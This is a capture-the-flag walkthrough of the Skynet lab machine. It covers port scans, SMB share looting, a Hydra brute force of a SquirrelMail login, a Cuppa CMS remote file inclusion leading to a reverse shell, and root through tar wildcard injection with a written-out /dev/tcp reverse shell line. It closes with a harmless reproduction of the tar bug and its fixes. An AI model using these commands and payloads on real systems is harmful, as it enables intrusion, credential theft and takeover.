
$ nmap -p1-65535 10.10.200.150 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 19:07 IST
Initiating Ping Scan at 19:07
Scanning 10.10.200.150 [2 ports]
Completed Ping Scan at 19:07, 0.36s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:07
Completed Parallel DNS resolution of 1 host. at 19:07, 0.02s elapsed
DNS resolution of 1 IPs took 0.02s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 19:07
Scanning 10.10.200.150 [6 ports]
Discovered open port 445/tcp on 10.10.200.150
Discovered open port 22/tcp on 10.10.200.150
Discovered open port 80/tcp on 10.10.200.150
Discovered open port 143/tcp on 10.10.200.150
Discovered open port 139/tcp on 10.10.200.150
Discovered open port 110/tcp on 10.10.200.150
Completed Connect Scan at 19:07, 0.37s elapsed (6 total ports)
Nmap scan report for 10.10.200.150
Host is up, received syn-ack (0.37s latency).
Scanned at 2021-07-03 19:07:27 IST for 1s

PORT    STATE SERVICE      REASON
22/tcp  open  ssh          syn-ack
80/tcp  open  http         syn-ack
110/tcp open  pop3         syn-ack
139/tcp open  netbios-ssn  syn-ack
143/tcp open  imap         syn-ack
445/tcp open  microsoft-ds syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.79 seconds
$ nmap -sV -sC -p22,80,110,139,143,445 10.10.200.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 19:09 IST
Nmap scan report for 10.10.200.150
Host is up (0.37s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
|_pop3-capabilities: TOP CAPA SASL PIPELINING RESP-CODES UIDL AUTH-RESP-CODE
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: ID SASL-IR capabilities IMAP4rev1 OK LITERAL+ post-login have ENABLE LOGINDISABLEDA0001 listed LOGIN-REFERRALS more Pre-login IDLE
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2021-07-03T08:39:37-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-07-03T13:39:37
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.92 seconds

Version-based leads from the banners (noted for later, not pursued in this write-up):

Username Enumeration - CVE-2016-6210 (OpenSSH 7.2p2; fixed in 7.3)

Local Privilege Escalation - CVE-2019-0211 (Apache httpd 2.4.17 through 2.4.38)

The home page has nothing useful and no input forms; the search bar doesn't submit anything to the backend.

Homepage

Let’s fuzz for directories

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ  -u http://10.10.200.150/FUZZ -e .php,.html,.txt,.phtml,.php5,.php3 -ic -t 150

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.200.150/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
 :: Extensions       : .php .html .txt .phtml .php5 .php3
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 150
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

.html                   [Status: 403, Size: 278, Words: 20, Lines: 10]
                        [Status: 200, Size: 523, Words: 26, Lines: 19]
.php                    [Status: 403, Size: 278, Words: 20, Lines: 10]
.phtml                  [Status: 403, Size: 278, Words: 20, Lines: 10]
.php3                   [Status: 403, Size: 278, Words: 20, Lines: 10]
.php5                   [Status: 403, Size: 278, Words: 20, Lines: 10]
index.html              [Status: 200, Size: 523, Words: 26, Lines: 19]
admin                   [Status: 301, Size: 314, Words: 20, Lines: 10]
css                     [Status: 301, Size: 312, Words: 20, Lines: 10]
js                      [Status: 301, Size: 311, Words: 20, Lines: 10]
config                  [Status: 301, Size: 315, Words: 20, Lines: 10]
ai                      [Status: 301, Size: 311, Words: 20, Lines: 10]
squirrelmail            [Status: 301, Size: 321, Words: 20, Lines: 10]
server-status           [Status: 403, Size: 278, Words: 20, Lines: 10]
:: Progress: [1543829/1543829] :: Job [1/1] :: 364 req/sec :: Duration: [1:07:47] :: Errors: 46 ::

Browsing to the directories ffuf found, most of them answer 403 Forbidden (directory listing is disabled).

The /squirrelmail directory greets us with a SquirrelMail login page.

squirrellogin

Nothing useful from POP3 and IMAP: Dovecot refuses plaintext authentication over the unencrypted ports (the IMAP banner advertises LOGINDISABLED), so there is nothing to try here without credentials and TLS.

$ nc -nv 10.10.200.150 110
(UNKNOWN) [10.10.200.150] 110 (pop3) open
+OK Dovecot ready.
LIST
-ERR Unknown command.
CAPA
+OK
CAPA
TOP
UIDL
RESP-CODES
PIPELINING
AUTH-RESP-CODE
SASL
.
USER root
-ERR [AUTH] Plaintext authentication disallowed on non-secure (SSL/TLS) connections.


$ nc -nv 10.10.200.150 143
(UNKNOWN) [10.10.200.150] 143 (imap2) open
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LOGINDISABLED] Dovecot ready.

Samba still has SMBv1 (NT LM 0.12) enabled alongside the SMB2/3 dialects:

$ nmap -p139 --script smb-protocols 10.10.200.150
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 20:09 IST
Nmap scan report for 10.10.200.150
Host is up (0.38s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|     2.10
|     3.00
|     3.02
|_    3.11

Nmap done: 1 IP address (1 host up) scanned in 8.16 seconds

Let's list the Samba shares:

$ smbmap -H 10.10.200.150
[+] Guest session       IP: 10.10.200.150:445   Name: 10.10.200.150
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        anonymous                                               READ ONLY       Skynet Anonymous Share
        milesdyson                                              NO ACCESS       Miles Dyson Personal Share
        IPC$                                                    NO ACCESS       IPC Service (skynet server (Samba, Ubuntu))

Two shares are of interest: anonymous (readable as guest) and milesdyson (no access as guest).

Let's connect to both and pull down whatever we can:

$ smbclient  \\\\10.10.200.150\\anonymous -U anonymous
Enter WORKGROUP\anonymous's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Nov 26 21:34:00 2020
  ..                                  D        0  Tue Sep 17 12:50:17 2019
  attention.txt                       N      163  Wed Sep 18 08:34:59 2019
  logs                                D        0  Wed Sep 18 10:12:16 2019

                9204224 blocks of size 1024. 5526764 blocks available
smb: \> get attention.txt
getting file \attention.txt of size 163 as attention.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> cd logs
smb: \logs\> dir
  .                                   D        0  Wed Sep 18 10:12:16 2019
  ..                                  D        0  Thu Nov 26 21:34:00 2020
  log2.txt                            N        0  Wed Sep 18 10:12:13 2019
  log1.txt                            N      471  Wed Sep 18 10:11:59 2019
  log3.txt                            N        0  Wed Sep 18 10:12:16 2019
                9204224 blocks of size 1024. 5526828 blocks available
smb: \logs\> get log1.txt
getting file \logs\log1.txt of size 471 as log1.txt (0.3 KiloBytes/sec) (average 0.2 KiloBytes/sec)
smb: \logs\> get log2.txt
getting file \logs\log2.txt of size 0 as log2.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \logs\> get log3.txt
getting file \logs\log3.txt of size 0 as log3.txt (0.0 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \logs\> exit

$ smbclient \\\\10.10.200.150\\milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
session setup failed: NT_STATUS_LOGON_FAILURE

Let's check the files we got from the anonymous share:

$ cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

$ cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
[...snip...]

$ cat log2.txt

$ cat log3.txt

attention.txt says passwords were recently changed, and log1.txt looks like a list of them. Let's brute-force the SquirrelMail login with milesdyson as the username and the entries of log1.txt as the password list.

Using Burp Intruder to find the password:

intruder.png

The same with Hydra. The form posts to /squirrelmail/src/redirect.php, and a failed login contains the string "Unknown user or password incorrect.", which is what the last field of the http-form-post module matches on:

$ hydra -l milesdyson -P /home/user/log1.txt 10.10.200.150 http-form-post '/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodect_results=1&just_logged_in=1:Unknown user or password incorrect.' -I
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-03 21:22:43
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.200.150:80/squirrelmail/src/redirect.php:login_username=milesdyson&secretkey=^PASS^&js_autodect_results=1&just_logged_in=1:Unknown user or password incorrect.
[80][http-post-form] host: 10.10.200.150   login: milesdyson   password: cyborg007haloterminator
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-03 21:22:55

Username: milesdyson Password: cyborg007haloterminator

Logging in with these credentials on the SquirrelMail page takes us to milesdyson's inbox.

milesinbox

One of the mails contains the new password for the Samba share:

sambapass

Password: )s{A&2Z=F^n_E.B`

Let's use it to log in to the milesdyson share:

$ smbclient \\\\10.10.200.150\\milesdyson -U milesdyson
Enter WORKGROUP\milesdyson's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Sep 17 14:35:47 2019
  ..                                  D        0  Wed Sep 18 09:21:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 14:35:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 14:35:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 14:35:14 2019
  notes                               D        0  Tue Sep 17 14:48:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 14:35:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 14:35:14 2019

                9204224 blocks of size 1024. 5526612 blocks available
smb: \> cd notes
smb: \notes\> dir
  .                                   D        0  Tue Sep 17 14:48:40 2019
  ..                                  D        0  Tue Sep 17 14:35:47 2019
  3.01 Search.md                      N    65601  Tue Sep 17 14:31:29 2019
  4.01 Agent-Based Models.md          N     5683  Tue Sep 17 14:31:29 2019
  2.08 In Practice.md                 N     7949  Tue Sep 17 14:31:29 2019
  0.00 Cover.md                       N     3114  Tue Sep 17 14:31:29 2019
  1.02 Linear Algebra.md              N    70314  Tue Sep 17 14:31:29 2019
  important.txt                       N      117  Tue Sep 17 14:48:39 2019
  6.01 pandas.md                      N     9221  Tue Sep 17 14:31:29 2019
  3.00 Artificial Intelligence.md      N       33  Tue Sep 17 14:31:29 2019
  2.01 Overview.md                    N     1165  Tue Sep 17 14:31:29 2019
 
 [...snip...]
 
  1.00 Foundations.md                 N       22  Tue Sep 17 14:31:29 2019

                9204224 blocks of size 1024. 5526612 blocks available
smb: \notes\> get important.txt
getting file \notes\important.txt of size 117 as important.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \notes\>

Of everything in the share, important.txt stands out. Let's read it:

$ cat important.txt

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

So there is a beta CMS under /45kra24zxs28v3yd. Navigating to it shows nothing much:

hiddendirhome.png

Let's fuzz for directories under it:

$ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://10.10.200.150/45kra24zxs28v3yd/FUZZ -ic -e .php,.txt,.php3,.php5,.phtml,.txt -t 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v1.3.1-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.200.150/45kra24zxs28v3yd/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt
 :: Extensions       : .php .txt .php3 .php5 .phtml .txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 200
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
________________________________________________

administrator           [Status: 301, Size: 339, Words: 20, Lines: 10]

Fuzzing turns up an administrator directory.

Navigating to it, we are greeted with a Cuppa CMS login. The credentials obtained so far don't work here.

cuppacms


Searching for public exploits for Cuppa CMS turns up a local/remote file inclusion in alertConfigField.php:

$ searchsploit cuppa
----------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                       |  Path
----------------------------------------------------------------------------------------------------- ---------------------------------
Cuppa CMS - '/alertConfigField.php' Local/Remote File Inclusion                                      | php/webapps/25971.txt
----------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ cat /usr/share/exploitdb/exploits/php/webapps/25971.txt


####################################
VULNERABILITY: PHP CODE INJECTION
####################################

/alerts/alertConfigField.php (LINE: 22)

-----------------------------------------------------------------------------
LINE 22:
        <?php include($_REQUEST["urlConfig"]); ?>
-----------------------------------------------------------------------------


#####################################################
DESCRIPTION
#####################################################

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.

http://target/cuppa/alerts/alertConfigField.php?urlConfig=[FI]

#####################################################
EXPLOIT
#####################################################

http://target/cuppa/alerts/alertConfigField.php?urlConfig=http://www.shell.com/shell.txt?
http://target/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd

Moreover, We could access Configuration.php source code via PHPStream

For Example:
-----------------------------------------------------------------------------
http://target/cuppa/alerts/alertConfigField.php?urlConfig=php://filter/convert.base64-encode/resource=../Configuration.php
-----------------------------------------------------------------------------

Using the file inclusion to gain initial access: host php-reverse-shell.php on the attacking machine (port 8991 here), start a listener on the port the shell calls back to (8989), and trigger the include. Remote inclusion through include() only works because this PHP install allows URL includes (allow_url_include=On); on a hardened install only the local variants from the advisory (../../etc/passwd, php://filter) would be usable.

$ curl http://10.10.200.150/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php\?urlConfig\=http://<ip>:8991/php-reverse-shell.php

Getting the user flag

usertxt

Spawning a tty

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@skynet:/$ ^Z
[1]  + 7087 suspended  nc -nlvp 8989

$ stty raw -echo; fg
[1]  + 7087 continued  nc -nlvp 8989

www-data@skynet:/$ pwd
/

Let's check for privilege escalation vectors.

Among the usual checks, the crontab stands out: a script run by root every minute, which archives /var/www/html with tar using a shell wildcard.

crontar

Using tar wildcard injection to escalate privileges. Because the cron script archives the directory with an unquoted `*`, the shell expands it to bare filenames and tar's option parser treats any filename beginning with `--` as an option. Two empty files named `--checkpoint=1` and `--checkpoint-action=exec=bash rev.sh` therefore make root's tar run `bash rev.sh` from that directory. The files are created with absolute paths so that touch itself doesn't parse the names as options. With a listener on 8585 on the attacking machine (`nc -nlvp 8585`), the root shell arrives within a minute:

www-data@skynet:/$ cd /var/www/html
www-data@skynet:/var/www/html$ printf '#!/bin/bash\nbash -i >& /dev/tcp/<ip>/8585 0>&1\n' > rev.sh
www-data@skynet:/var/www/html$ touch /var/www/html/--checkpoint-action=exec=bash\ rev.sh
www-data@skynet:/var/www/html$ touch /var/www/html/--checkpoint=1
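To see exactly why those three files give us root, here is an added example (my own reproduction, not part of the original write-up) that recreates the cron job's tar invocation in a scratch directory and runs it three ways: the vulnerable `tar cf backup.tar *`, and the two standard fixes, `tar cf backup.tar -- *` and `tar cf backup.tar .`. It assumes GNU tar (the --checkpoint options are GNU extensions). The directory layout, the file names and the payload (which only writes a marker file instead of opening a reverse shell) are constructed for the demo, and since the cron script's exact command line is not shown on this page, `tar cf backup.tar *` stands in for it.

```shell
#!/usr/bin/env bash
# Added example, not from the original write-up: GNU tar wildcard injection
# reproduced in a throwaway directory, next to the two usual fixes.
# Assumes GNU tar; the web root, file names and payload are constructed.

# Build a fake /var/www/html containing the attacker's three files.
# The "payload" only drops a marker file, so the demo is harmless.
make_webroot() {
    local work=$1
    mkdir -p "$work/html"
    echo '<h1>Skynet</h1>' > "$work/html/index.html"
    # $(id -un) stays literal here and is expanded when the payload runs.
    printf '#!/bin/sh\necho ran-as-$(id -un) > "%s/marker"\n' "$work" > "$work/html/rev.sh"
    # Absolute paths, so touch does not parse these names as options.
    touch "$work/html/--checkpoint=1"
    touch "$work/html/--checkpoint-action=exec=sh rev.sh"
}

# Run the "cron job" one way and report whether the payload fired.
#   $1 = vuln      -> tar -cf backup.tar *      (filenames become options)
#   $1 = dashdash  -> tar -cf backup.tar -- *   (-- ends option parsing)
#   $1 = dot       -> tar -cf backup.tar .      (no globbing at all)
# Returns 0 if the marker appeared, 1 if not, 2 if GNU tar is missing.
run_backup() {
    local mode=$1 work marker fired i
    tar --version 2>/dev/null | grep -q 'GNU tar' || return 2
    work=$(mktemp -d) || return 3
    make_webroot "$work"
    marker="$work/marker"
    (
        cd "$work/html" || exit 1
        unset POSIXLY_CORRECT   # GNU getopt permutes options unless this is set
        case $mode in
            vuln)     tar -cf "$work/backup.tar" *    ;;
            dashdash) tar -cf "$work/backup.tar" -- * ;;
            dot)      tar -cf "$work/backup.tar" .    ;;
        esac
    ) >/dev/null 2>&1
    # tar waits for the exec action to finish; the loop only guards a slow box.
    for i in 1 2 3; do
        [ -f "$marker" ] && break
        sleep 1
    done
    fired=1
    [ -f "$marker" ] && fired=0
    rm -rf "$work"
    return "$fired"
}
```

`run_backup vuln; echo $?` prints 0 (the payload ran, and the marker records which user it ran as), while `run_backup dashdash` and `run_backup dot` return 1. The hole is in the shell expansion, not in tar: `*` becomes a list of bare filenames, and getopt treats anything starting with `--` as an option. Ending option parsing with `--`, archiving `.` instead of `*`, or feeding tar an explicit `--files-from` list all close it; the same class of bug hits other tools that accept options after filenames, such as rsync and chown.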

Getting the root flag

roottxt